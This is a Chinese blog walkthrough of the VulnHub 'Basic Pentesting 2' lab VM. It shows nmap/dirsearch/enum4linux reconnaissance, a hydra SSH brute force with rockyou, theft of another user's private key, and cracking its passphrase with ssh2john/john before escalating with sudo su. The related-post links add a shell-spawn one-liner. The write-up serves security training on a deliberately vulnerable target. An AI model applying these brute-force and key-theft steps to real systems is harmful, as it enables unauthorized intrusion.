basic_pentesting_2靶机渗透测试

已于 2024-08-06 19:58:31 修改
阅读量378 收藏 4
点赞数 3
文章标签: web安全
于 2024-08-06 19:57:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58786230/article/details/140964672
版权

一、靶机下载地址

https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz

二、信息收集

1、主机发现

# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:CB:65:92"

2、端口扫描

# 使用命令
nmap 192.168.145.194 -p- -sV

3、指纹识别

# 使用命令
whatweb 192.168.145.194

4、目录扫描

# 使用命令
dirsearch -u  "http://192.168.145.194"

三、获取shell

1、访问靶机IP地址,提示正在维护

2、查看源码,有一个提示,查看他们的开发笔记

3、拼接并访问development,发现dev.txt和j.txt

4、dev.txt文件的内容

5、j.txt文件的内容

6、大概意思是说-K在说 J 这个用户是一个弱口令,使用kali中的enum4linux工具进行扫描,扫描到了 kay 和 jan,应该就是之前的 K 和 J

# 使用命令
enum4linux 192.168.145.194

7、因为提到了 J 存在弱口令,所以使用hydra工具尝试爆破ssh,密码为:armando

# 使用命令
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.145.146 -t 64

8、尝试使用ssh进行连接,连接成功

四、提权

1、sudo -l 查看当前权限,没有可利用的,查看用户家目录下,在kay目录下发现pass.pak和ssh公私钥文件

# 使用命令
cd /home/kay
ls -al

2、查看pass.pak文件,没有权限

# 使用命令
cat pass.pak

3、进入.ssh目录,发现了私钥文件

# 使用命令
cd .ssh

ls -al

4、查看私钥文件内容

# 使用命令
cat id_rsa

5、将内容复制到 kali 中,并赋予权限

# 使用命令
vim id_rsa

chmod 600 id_rsa

6、尝试利用私钥连接,但是需要密码

# 使用命令
ssh -i id_rsa kay@192.168.145.194

7、利用 ssh2john工具 将 id_rsa 转换为哈希

# 使用命令
ssh2john id_rsa > hash.txt

8、使用 john工具进行解密,得到密码为 beeswax

9、再次使用私钥登录,登录成功

# 使用命令
ssh -i id_rsa kay@192.168.145.194

10、使用sudo -l命令查看可执行的命令,发现需要密码

11、查看之前的pass.pak文件,这个可能是需要的密码

12、再次查看权限,输入密码,成功显示

13、直接sudo su提权,提权成功

# 使用命令
sudo su

果冻*果冻*
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BasicPentesting:从TryHackMe清除基本渗透测试
02-12
基本的沉思 IP: 10.10.251.73 斯坎尼格 开放端口 22 80 139 445 8009 8080 问题与解答 Web服务器上的隐藏目录( development ,可通过GoBuster找到) 用户名(通过enum4linux找到... 在ssh服务器中,使用与John一起
30 天渗透测试练习2.pdf
10-06
12. **PenTesting Cloud Learning**:随着云计算的普及,渗透测试也扩展到了云环境。这个学习资源提供对云环境安全测试的教育。 13. **Cerberus, Coder等HTB机器**:这些机器进一步加深了对渗透测试技巧的理解,...
靶机渗透测试basic_pentesting_1靶机提权
x_13579的博客
04-13 768
靶场提权
basic_pentesting_1靶机渗透
weixin_64809022的博客
06-23 704
Python提权: python3 -c 'import pty;pty.spawn("/bin/bash")'
[Vulnhub] basic_pentesting 2
weixin_63231007的博客
07-12 697
目录信息搜集 S2-052漏洞利用 Hydra爆破jan密码(1) vim读取密码 (2) ssh公钥私钥获取身份登录凭据下载链接:Basic Pentesting: 2 ~ VulnHubnmap -sP 192.168.236.0/24 扫描一下靶机ipnetdiscover -i eth0 -r 192.168.1.0/24靶机ip : 192.168.236.138nmap -A 192.168.236.138 扫描一下靶机的具体信息。 收集靶场环境的服务和端口信息我们可以看见139和4...
basic_pentesting1靶机
qq_68865419的博客
10-19 238
这次我们使用一种新方法查看靶机的ipNetdiscover:二层发现工具,拥有主动和被动发现两种方式。首先查看靶机的ip​​​​​​然后查看本机的ip,使用ipconfig然后扫描靶机ip。
Vulnhub靶场渗透-basic_pentesting_1
paidx0
09-22 647
前言 靶机ip(192.168.110.134) 攻击机ip(192.168.110.127) 网络NAT模式 这次的靶场比较简单,却绕了挺大弯的 信息收集 找到隐藏页 简单翻了一下也没啥可以利用的东西,继续扫隐藏页目录 找到一些看似有用其实没啥用的东西,比如WordPress的登录页,文件包含页 这全都是误导,显然我被骗了,一直在爆破登录页和一个一个文件的看,文件数量太多了浪费很多时间 正确解法 重新回到nmap,这次不偷懒,更详细的扫描一下服务的版本号 nmap -A -v 192.168
[Vulnhub] basic_pentesting_1
weixin_63231007的博客
07-01 587
靶机:192.168.236.133 访问试试,没有得到可用信息。 获得了ftp服务的版本,想搜索一下该版本是否有可利用的漏洞的话,可用msfconsole 发现了一个该版本可利用漏洞 使用use命令,输入序号即可,0 进入该漏洞 exploitshow options 看一下参数,一个是RHOSTS 一个是RPORT 通过set命令来设置一下地址和端口,set RHOSTS 192.168.236.133下一步设置payload:set payload cmd/unix/reverse 这个是反向连接的
靶场练习第五天~vulnhub靶场之basic_pentesting_1
qq_57976347的博客
01-30 754
一、信息收集 1.主机发现 (1)Netdiscover:专用的二层发现工具,拥有主动和被动发现两种方式 具体操作如下,查看一下kali的ip 然后使用命令sudo netdiscover,发现了靶机的ip 2.端口扫描,服务识别 (1)使用nmap -A 开放的端口以及靶场操作系统和版本的探测,使用方法:nmap -A 192.168.101.106 二、后渗透 1.根据服务版本搜索相关漏洞 这里用到msfconsole,关于msfconsole介绍:msfconsole..
靶机-basic_pentesting_2
-----------------------------------------------------------------------------------------
01-17 910
arp-scan -l查找靶机IPmasscan 192.168.253.154 --ports 0-65535 --rate=10000 端口扫描nmap扫描nmap -T5 -A -p- 192.168.253.154目录扫描80端口For J:it?-K两个文档大概意思是:struts是2.5.12版本,并且密码/etc/shadow 里的容易破解访问8080端口,没找到东西主页的登录是tomcat有提到 three samba服务获取数据。
Vulnhub靶机basic_pentesting_2(渗透测试详解)
最新发布
2301_78721909的博客
08-07 65
Vulnhub靶机basic_pentesting_2(from wuhu)
信息安全_数据安全_Pentesting ICS 102.pdf
08-22
信息安全_数据安全_Pentesting ICS 102 信息保护 网络安全 web安全 网络安全 安全设计
Pentesting:渗透测试工具和资源
03-28
渗透测试 渗透测试工具和资源
渗透测试报告public-pentesting-reports
03-03
渗透测试报告public-pentesting-reports
web安全基础学习
m0_71332744的博客
07-31 575
记录学习的原理,少有实操持续更新
C++在网络安全领域的应用
2302_79331124的博客
08-04 972
总的来说,C++在网络安全领域的应用广泛且深入。其高性能、灵活性和对底层硬件的控制使其成为开发各种安全解决方案的理想选择。随着网络安全威胁的不断演变,C++将继续在保护数字世界的过程中发挥重要作用。如果你对网络安全感兴趣,学习和掌握C++无疑将为你的技术发展方面提供强大的助力。
网络安全(黑客)—自学手册
dexi113的博客
08-05 1243
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
web安全】权限漏洞之未授权访问
qq_70836100的博客
08-04 889
漏洞修复:1.设置防火墙策略,限定 IP 访问服务。2.在admin.system.users中添加用户,启动认证。漏洞修复:1.修改绑定的IP、端口和指定访问者IP。步骤二:进入执行页面http://xxx.xxx.xxx.xxx:xxxx/manage/script/index.php。漏洞修复:1.禁止使用root权限启动redis服务。漏洞修复:1.为ZooKeeper配置相应的访问权限。漏洞修复:1.开启身份验证,防止未经授权用户访问。stat:列出关于性能和连接的客户端的统计信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值